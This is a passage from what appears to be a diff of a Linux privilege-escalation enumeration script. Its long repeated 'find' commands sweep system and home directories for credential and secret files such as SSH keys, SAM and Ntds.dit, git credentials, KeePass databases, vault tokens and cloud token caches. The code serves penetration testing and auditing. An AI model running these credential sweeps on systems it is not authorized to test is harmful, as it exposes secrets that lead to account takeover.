\"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"agent*\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_USR=`eval_bckgrd "find /usr -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"ssh*config\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_VAR=`eval_bckgrd "find /var -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"system.d\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"neo4j\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \"zabbix\" -o -name \"environments\" -o -name \"ldap\" -o -name \"sites-enabled\" -o -name \"postfix\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"logstash\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_BIN=`eval_bckgrd "find /bin -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name 